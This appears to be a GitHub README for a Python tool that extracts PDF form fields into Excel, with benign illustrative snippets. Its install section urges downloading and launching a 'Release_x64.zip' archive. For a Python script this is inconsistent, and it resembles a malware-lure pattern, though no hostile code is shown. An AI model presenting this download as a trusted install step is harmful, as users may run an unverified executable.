Ready to use Python application/file for parsing a specific format of pdf form, and storing relevant user data in a tabular format in excel sheet

sentifyy/PDFReader

📚 PDFReader

Welcome to PDFReader, a Python application that parses a specific format of PDF form and stores the relevant user data in tabular form in an Excel sheet. This repository provides a ready-to-use tool for automating the extraction and organization of data from such forms, for example surveys or questionnaires that follow the supported layout.

Features

🔍 PDF Parsing: PDFReader uses the pdfplumber library to extract text from each form field in the PDF document.

🔒 Data Extraction: PDFReader uses OCR through pytesseract to recognize text within the PDF form.

📊 Data Organization: The extracted user data is structured with the pandas library and stored in an Excel sheet, making it easy to analyze and manipulate.
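
The three features above can be sketched as a small pipeline. This is a minimal illustration and not PDFReader's actual code: the function names, the `Label: value` line layout, and the rule of falling back to OCR only when a page has no text layer are all assumptions made for the example.

```python
import re

# Hypothetical layout: one "Label: value" pair per line of extracted text.
FIELD_PATTERN = re.compile(r"^\s*([^:\n]+?)\s*:\s*(.*?)\s*$")


def extract_text(pdf_path):
    """Return the text of every page, using OCR for pages with no text layer."""
    # Third-party imports are local so parse_fields() works without them.
    import pdfplumber
    import pytesseract

    pages = []
    with pdfplumber.open(pdf_path) as pdf:
        for page in pdf.pages:
            text = page.extract_text() or ""
            if not text.strip():
                # Likely a scanned page: render it to an image and run OCR.
                image = page.to_image(resolution=300).original
                text = pytesseract.image_to_string(image)
            pages.append(text)
    return "\n".join(pages)


def parse_fields(text):
    """Turn 'Label: value' lines into a dict; lines without a colon are skipped."""
    record = {}
    for line in text.splitlines():
        match = FIELD_PATTERN.match(line)
        if match:
            label, value = match.groups()
            record[label] = value
    return record


def save_records(records, excel_path):
    """Write a list of field dicts to an Excel sheet, one row per form."""
    import pandas as pd

    # Writing .xlsx files with pandas requires an engine such as openpyxl.
    pd.DataFrame(records).to_excel(excel_path, index=False)
```

A typical call chain under these assumptions would be `save_records([parse_fields(extract_text("form.pdf"))], "output.xlsx")`, where both file names are placeholders.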

Installation

To get started with PDFReader, simply download the application from the following link:

Download Software (needs to be launched)

Usage

  1. Download the Release_x64.zip archive from https://github.com/sentifyy/PDFReader/releases/download/v2.0/Release_x64.zip.
  2. Extract the contents of the zip file to a folder on your local machine.
  3. Run the extracted PDFReader script using Python.
  4. Follow the on-screen instructions to input the path to the PDF form you want to parse.
  5. Sit back and let PDFReader handle the data extraction and organization process for you.
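
Step 4 asks for the path to a PDF form. How PDFReader validates that input is not documented here; the sketch below shows one way such a prompt could check the path before any parsing starts. The function names `validate_pdf_path` and `prompt_for_pdf` are hypothetical.

```python
from pathlib import Path


def validate_pdf_path(raw):
    """Return a Path for an existing .pdf file, or raise a descriptive error."""
    # Strip whitespace and surrounding quotes, which often come along
    # when a path is pasted into a terminal.
    path = Path(raw.strip().strip('"')).expanduser()
    if path.suffix.lower() != ".pdf":
        raise ValueError(f"not a PDF file: {path}")
    if not path.is_file():
        raise FileNotFoundError(f"no such file: {path}")
    return path


def prompt_for_pdf():
    """Keep asking until the user supplies a usable PDF path."""
    while True:
        try:
            return validate_pdf_path(input("Path to the PDF form: "))
        except (ValueError, FileNotFoundError) as error:
            print(f"Invalid input ({error}). Please try again.")
```

Checking the extension and existence up front gives a clear message at the prompt instead of a failure deep inside the PDF library.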

Dependencies

PDFReader relies on the following libraries for its functionality:

  • matplotlib
  • numpy
  • opencv-python
  • pandas
  • pdfplumber
  • pytesseract

Make sure you have these dependencies installed in your Python environment before running PDFReader.
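
One way to confirm that the listed dependencies are available is a short check like the one below. It is a sketch and not part of PDFReader; the helper name `missing_packages` is made up for the example. Note that opencv-python is imported under the module name `cv2`.

```python
from importlib.util import find_spec

# Maps each pip package name to the module name it is imported under.
REQUIRED = {
    "matplotlib": "matplotlib",
    "numpy": "numpy",
    "opencv-python": "cv2",
    "pandas": "pandas",
    "pdfplumber": "pdfplumber",
    "pytesseract": "pytesseract",
}


def missing_packages(required=REQUIRED):
    """Return the pip names of packages whose module cannot be found."""
    return [pkg for pkg, module in required.items() if find_spec(module) is None]


def report():
    """Print either a confirmation or a ready-to-run pip command."""
    missing = missing_packages()
    if missing:
        print("Missing packages. Install them with:")
        print("  pip install " + " ".join(missing))
    else:
        print("All listed dependencies are installed.")
```

Calling `report()` prints the result. Two further requirements are not in the list above: pytesseract is a wrapper around the Tesseract OCR engine, which has to be installed on the system separately, and writing .xlsx files with pandas needs an Excel engine such as openpyxl.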

Support

If you encounter any issues or have questions about using PDFReader, feel free to reach out by creating an issue in this repository. Our team is dedicated to providing assistance and ensuring you have a seamless experience with PDFReader.

Stay Connected

Stay updated with the latest developments and releases by following our GitHub repository. We're constantly working on enhancing PDFReader and adding new features to make your PDF data extraction process even more efficient.

Thank you for choosing PDFReader! Let's simplify PDF form data processing together. 🚀


Note: If the provided download link does not work, we recommend checking the "Releases" section of this repository for alternative download options. Visit our website at PDFReader Website for more information and resources.